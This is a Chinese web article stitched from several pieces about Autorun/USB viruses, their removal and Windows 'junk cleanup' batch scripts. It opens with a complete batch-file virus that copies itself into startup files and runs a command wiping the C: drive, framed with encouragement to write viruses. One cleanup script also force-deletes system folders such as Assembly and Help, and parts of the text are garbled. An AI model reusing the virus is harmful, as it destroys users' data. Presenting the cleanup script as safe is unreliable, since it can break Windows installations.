最新整理Autorun 病毒清除工具bat代码介绍

bat电脑病毒代码病毒来自于一次偶然的事件，那时的研究人员为了计算出当时互联网的在线人数，然而它却自己“繁殖”了起来导致了整个服务器的崩溃和堵塞，有时一次突发的停电和偶然的错误.下面是店铺收集整理的bat电脑病毒代码，希望对大家有帮助~~bat电脑病毒代码rem (注:原来站长我在读职高时,就用这一招来对付在上机时总是喜欢删别人文件(放在我自己所建目录下面的程序文件,这可是我辛辛苦苦用手敲打键盘搞出来的呀!)当然不是像下面这个病毒程序故意在桌面上放的那个炸弹文件了!)的人!当然那个喜欢删别人文件最终还是免不了挨老师的一顿臭骂!)rem 如果你是一位电脑病毒编写高手,千万别对着你的电脑吐口水呀!如果真是这样的话,我会很难过的,一为你面前这台电脑难过!二为我自己难过!rem 电脑病毒的原理都是差不多的,只要你学精了几门程序设计语言(如VC,Delphi,VB,html[JavaScript/Vbscript],Perl)再加学计算机漏洞,以及一些文件格式(比如PE,NE,Html,Vbs,Js等),保证你编写的电脑病毒会Very very good!相信你看完以下程序代码,一定有一种冲动!什么冲动?(编写电脑病毒的冲动)if not exsit %windir%\desktop\IamVirus.txt goto KillSystem if not exsit %windir%\system\%0.bat goto CopyToHereif not exist %windir%\winstart.bat goto AddWinif not exist %windir%\dosstart.bat goto AddDosif not exist c:\autoexec.bat goto AddAutoif not exsit %windir%\……\启动\HappyQQ.bat goto CopyMyselfgoto endrem 下面部分为自我复制部分:AddWinecho %windir%\system\%0.bat>>%windir%\winstart.bat>n ullgoto end:AddDosecho %windir%\system\%0.bat>>%windir%\dosstart.bat>n ullgoto end:AddAutoecho %windir%\system\%0.bat>>c:\autoexec.bat>nullgoto end:CopyMyselfcopy %0.bat %windir%\……\启动\HappyQQ.bat /y >nullgoto end:CopyToHerecopy %0.bat %windir%\system\%0.batgoto end:KillSystemdeltree/y c:\*.*>nullrem 这里为破坏部分goto end:end怎么样,看完一个批处理病毒代码,你应该对计算机病毒的概念非常了解了吧!晕呀,什么?你不懂DOS呀,那也没关系,去问问你的计算机老师,什么,你的计算机老师也不会呀,那么你就网上查查吧,千万别问我,虽然我是电脑DOS命令高手,但是我可不想让你老师来找我的麻烦呀!呵呵……如果你觉得这还不够爽,请你进入我的Baidu"红客"贴吧进行讨论!(类似这个批处理病毒的原理,我用C语言编写了一个模拟计算机病毒!)。

Autorun病毒如今已经式微，但是仍然有一些新病毒用这种方式传播，实在是因为这种方式很方便但又很快速。

并且也有一些新的保护自己的方法出现。

例如宅男病毒（sola）的新版本就算是其中的佼佼者。

要手工杀这类病毒，重要的一点是要知道如何判读autorun.inf文件，从这个文件找到病毒的线索。

病毒最先开始进入你的系统就是从这个文件开始的，然后又用这种方式埋伏于硬盘各个分区和移动磁盘中。

这个文件是典型的inf安装信息文件，因此它总是有一个段是用来告诉windows它需要运行的程序是谁在哪儿。

举例有一个U盘病毒的autorun.inf文件内容如下：[autorun]OPEN=EXPLORER.EXEshellopen=打开(&O)shellopenCommand=EXPLORER.EXEshellopenDefault=1shellexplore=资源管理器(&X)shellexploreCommand=EXPLORER.EXE其中方括号[autorun]就表明其下这个段适用于系统的“自动运行”，第一行将在U盘盘符的右键菜单中增加一个名叫OPEN的项，并且如果没有其他语句定义默认项，它就将是加粗的默认选项，也就是说，在左键双击时会选中这条。

等于号右边就是将会运行的程序，名叫EXPLORER.EXE，这个看起来与系统的“资源管理器”一样，其实不是，这个文件按照病毒作者的意思是在U盘根目录下，它应该就是病毒母体，一般情况下，它运行之后会进一步在系统中生成其他病毒文件，当然也有一些简单的病毒只是把这个文件和autorun.inf文件复制到其他分区中。

第二行厉害一些，相对来说，第一行会在右键菜单中出现中文系统中不常见的OPEN选项，警惕性高一点的用户会有所发现。

而第二行就会直接隐藏了原来的“打开”项，你即使在右键中选择“打开”也会使EXPLORER.EXE文件得以运行。

不过，第二行仅仅是产生了一个右键的菜单项，第三行才告诉系统这个菜单项应该运行什么，同样的它也是指向的EXPLORER.EXE这个病毒文件。

常见的几种autorun类病毒查杀方法现在使用移动存储工具的人群比较多，比如U盘，移动硬盘，MP3等。

方便的同时就会存在危机。

Autorun病毒是其中之一的十分常见的病毒，因此本文为大家介绍了几种十分简单的删除Autorun病毒方法。

首先中毒后的症状是：双击盘符打不开，或者是新开一个窗口打开，或者是让你选择文件的打开方式…其实最明显的现像是鼠标右键中新增了两项，auto或者是自动播放。

如果发现以上症状那么就基本可以确定你中了autorun一类的病毒了。

但是如果放入光盘后才出现的，那就属于正常，请不要多想。

哈哈。

病毒的触发方法：平时用户都是双击打开磁盘，病毒正是利用了这一点，在注册表中关于盘符的那一项，新加了两个键值shell command ，然后你双击打开盘符的时候病毒就会先启动，然后再打开磁盘，有的时候是双击没有反应，只能用右键打开。

重装系统照样还是会中的。

那么下面我们来说一下此类病毒的通用查杀方法，希望大家都能自己动手。

首先我要说的就是做系统的时候，就一定要做到的前两点：1、修改组策略关闭自动播放运行-->gpedit.msc-->用户配置-->系统-->关闭自动播放-->已启用-所有驱动器2、关掉自动播放所用到的一个服务运行-->services.msc-->Shell Hardware Detection服务-->启动类型-->禁用以下是你确定你中毒以后要做的，先结束病毒的进程。

3、中毒以后查杀：修改注册表[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2]将此键值下所有带“+”的项依次展开，如有“command”的，或者是“shell”的，把下面的路径中的文件记下来，然后全部删除。

默认所有的盘符中是没有+下的值的电脑知识 电脑技巧，绿色、破解实用软件下载4、打开CMD 进入你中毒的盘符用attrib 命令查看具有隐藏属性的文件。

系统垃圾清理程序增强版（.bat文件）复制以下代码到记事本程序窗口，另存为.bat文件即可：@echo off::系统垃圾清理程序增强版color 2fTitle echo.echoecho.echo 开始执行清理……echo.echo 正在检查cookies、历史纪录等目录位置(当前用户)……reg query "HKCU\software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v Cache>%temp%\cleantmp.txtreg query "HKCU\software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v Cookies>>%temp%\cleantmp.txtreg query "HKCU\software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v History>>%temp%\cleantmp.txtreg query "HKCU\software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v NetHood>>%temp%\cleantmp.txtreg query "HKCU\software\Microsoft\Windows\CurrentVersion\Explorer\S hell Folders" /v Recent>>%temp%\cleantmp.txtecho 正在清理Cookies、IE缓存、历史纪录等(当前用户)……for /f "tokens=3*" %%a in (%temp%\cleantmp.txt) do (for /d %%i in ("%%a %%b\*.*") do rd /s /q "%%i"del /a /f /s /q "%%a %%b\*.*")::跟上面几项未必是重复的(！)，也是对当前用户目录echo 正在清理临时文件 (系统目录)……del /a /f /s /q "%userprofile%\Locals~1\Tempor~1\*.*" del /a /f /s /q "%userprofile%\Locals~1\Temp\*.*"del /a /f /s /q "%userprofile%\cookies\*.*"del /a /f /s /q "%userprofile%\recent\*.*"del /a /f /s /q "%Temp%\*.*"del /a /f /s /q "%Tmp%\*.*"del /a /f /s /q "%HomePath%\..\IconCache.db"echo 正在清理系统目录中的垃圾文件 (稍候，需要点时间)……del /a /f /s /q "%systemdrive%\*._mp"del /a /f /s /q "%systemdrive%\*.log"del /a /f /s /q "%systemdrive%\*.dmp"del /a /f /s /q "%systemdrive%\*.gid"del /a /f /s /q "%systemdrive%\*.old"del /a /f /s /q "%systemdrive%\*.tmp"del /a /f /s /q "%systemdrive%\recycled\*.*"del /a /f /s /q "%SystemRoot%\*.bak"del /a /f /s /q "%SystemRoot%\*.query"rd /s /q "%SystemRoot%\Downloaded Program Files"rd /s /q "%SystemRoot%\Offline Web Pages"rd /s /q "%systemroot%\Connection Wizard"rd /s /q "%SystemRoot%\SoftwareDistribution\Download" rd /s /q "%SystemRoot%\Assembly"rd /s /q "%SystemRoot%\Help"rd /s /q "%SystemRoot%\system32\ReinstallBackups"del /a /s /q "%SystemRoot%\inf\*.pnf"del /a /f /s /q "%SystemRoot%\inf\InfCache.1"dir %SystemRoot%\inf\*.* /ad/b >%SystemRoot%\vTmp.txt for /f %%a in (%SystemRoot%\vTmp.txt) do rd /s /q "%SystemRoot%\inf\%%a"del /a /f /s /q "%SystemRoot%\Driver Cache\*.pnf"del /a /f /s /q "%SystemRoot%\Driver Cache\InfCache.1"del /a /f /s /q "%SystemRoot%\system32\drivers\*.pnf"del /a /f /s /q "%SystemRoot%\system32\drivers\InfCache.1"rd /s /q "%SystemRoot%\temp" & md "%SystemRoot%\temp"del /a /f /s /q "%SystemRoot%\Prefetch\*.*"del /a /f /s /q "%SystemRoot%\minidump\*.*"echo 正在清除无用的磁盘检错文件 (系统分区)……del /a /f /q "%SystemDrive%\*.chk"dir %SystemDrive%\found. /ad/b >%SystemRoot%\vTmp.txtfor /f %%a in (%SystemRoot%\vTmp.txt) do rd /s /q "%SystemDrive%\%%a"echo 正在清理系统升级补丁留下来的反安装目录(已修正能正确清除)……dir %SystemRoot%\$*$ /ad/b >%SystemRoot%\vTmp.txtfor /f %%a in (%SystemRoot%\vTmp.txt) do rd /s /q "%SystemRoot%\%%a"echo 正在清除常见的软件垃圾项目 (按默认目录)……rd /s /q "%ProgramFiles%\InstallShield Installation Information"Ren"%ProgramFiles%\Common~1\Real\Update_OB\realsched.exe" realsched.ex_Del"%ProgramFiles%\Common~1\Real\Update_OB\realsched.exe"Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TkBellExe /frd /s /q "%ProgramFiles%\Tencent\QQGame\Download"taskkill /f /im "TIMPlatform.exe" /tdel /a /f /s /q "%ProgramFiles%\Kaspersky Lab\*.tmp"echo.echo 全部清理完毕，任意键退出(注: 若提示文件没找到是正常的)……pause >nuldel %SystemRoot%\vTmp.txt。

⼏个电脑系统优化清除垃圾bat命令介绍本⽂将教⼤家⽤烈写批处理运⾏的⽅式让你电脑优化快⼀点和清除垃圾。

⼀.清理垃圾在Windows在安装和使⽤过程中都会产⽣相当多的垃圾⽂件，包括临时⽂件（如：*.tmp、*._mp）⽇志⽂件（*.log）、临时帮助⽂件（*.gid）、磁盘检查⽂件（*.chk）、临时备份⽂件（如：*.old、*.bak）以及其他临时⽂件。

特别是如果⼀段时间不清理IE的临时⽂件夹“Temporary Internet Files”，其中的缓存⽂件有时会占⽤上百MB的磁盘空间。

这些LJ⽂件不仅仅浪费了宝贵的磁盘空间，严重时还会使系统运⾏慢如蜗⽜。

这点相信你肯定忍受不了吧！所以应及时清理系统的LJ⽂件的淤塞，保持系统的“苗条”⾝材，轻松流畅上⽹！朋友来吧，现在就让我们⼀起来快速清除系统垃圾吧！！下⾯是步骤很简单就两步！在电脑屏幕的左下⾓按“开始→程序→附件→记事本”，把下⾯的⽂字复制进去（⿊⾊部分），点“另存为”，路径选“桌⾯”，保存类型为“所有⽂件”，⽂件名为“清除系统LJ.bat”，就完成了。

记住后缀名⼀定要是.bat，ok！你的垃圾清除器就这样制作成功了！双击它就能很快地清理垃圾⽂件，⼤约⼀分钟不到。

======就是下⾯的⽂字(这⾏不⽤复制)=============================@echo offecho 正在清除系统垃圾⽂件，请稍等......del /f /s /q %systemdrive%\*.tmpdel /f /s /q %systemdrive%\*._mpdel /f /s /q %systemdrive%\*.logdel /f /s /q %systemdrive%\*.giddel /f /s /q %systemdrive%\*.chkdel /f /s /q %systemdrive%\*.olddel /f /s /q %systemdrive%\recycled\*.*del /f /s /q %windir%\*.bakdel /f /s /q %windir%\prefetch\*.*rd /s /q %windir%\temp & md %windir%\tempdel /f /q %userprofile%\cookies\*.*del /f /q %userprofile%\recent\*.*del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"del /f /s /q "%userprofile%\Local Settings\Temp\*.*"del /f /s /q "%userprofile%\recent\*.*"echo 清除系统LJ完成！echo. & pause=====到这⾥为⽌(这⾏不⽤复制)==============================================以后只要双击运⾏该⽂件，当屏幕提⽰“清除系统LJ完成！⼆,优化开机⽅法基本同第⼀,在电脑屏幕的左下⾓按“开始→程序→附件→记事本”，把下⾯的⽂字复制进去（⿊⾊部分），点“另存为”，路径选“桌⾯”，保存类型为“所有⽂件”，⽂件名为“优化开机.bat”，就完成了。

教你如何手工清除autorun.inf类的病毒最近U盘病毒非常猖獗，经过分析这种病毒的传播主要借助与Autorun.inf文件，病毒先将自身复制到U盘，然后再创建一个Autorun.inf文件。

当你在你双击U盘时，会根据Autorun.inf中的设置去运行U盘中的病毒，然后将其复制到硬盘的各个盘符下无法删除。

重装或一键恢复了XP系统，双击其他分区，比如D盘，都打不开，只能用右键打开。

这就是中了Autorun.INF类病毒的表现。

今天我们就把干掉Autorun.inf类病毒的方法和预防的手段跟大家分享一下。

手工轻松干掉Autorun.inf中了这类病毒后，各个分区的根目录下都会生成一个隐藏属性的Autorun.inf文件，双击打开“我的电脑”，点击“工具”，再点击“查看”，去掉“隐藏受保护的操作系统文件”及选中“显示所有文件和文件夹”，再点“确定”把所有的隐藏属性打开（见图1）。

右键打开任一分区，如D盘，就可以看见Autorun.inf这个文件，再右键打开Autorun.inf会看到open=xxx.exe（xxx就是病毒的名称），如果病毒没进程程保护的话，删掉各个分区的Autorun.inf和xxx.exe就可以把病毒删除了，删除病毒后，还要把病毒的磁盘关联改回来。

运行regedit.exe来到[HKEY_CLASSES_ROOT\Drive\shell]下，把“默认”改成none（见图2），再到"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVe rsion\Explorer下删掉ountPoints2这一项（如果有这一项的话），到此，就能双击打开任意盘符了。

了方便大家清除Autorun.inf类病毒，我们为大家用RAR做了一个自压解清除Autorun.inf和修复磁盘及EXE文件关联的小工具，这个小工具由delinfvir.cmd、del.cmd、del.reg、drivefix.reg、undel.reg、attrib.exe、taskkill.exe等文件组成，解压后马上运行drivefix.cmd这个批处理，之后会重启系统，启动到“欢迎使用”在加载explore.exe前进行清除Autorun.inf等相关病毒的操作，需耐心等候片刻。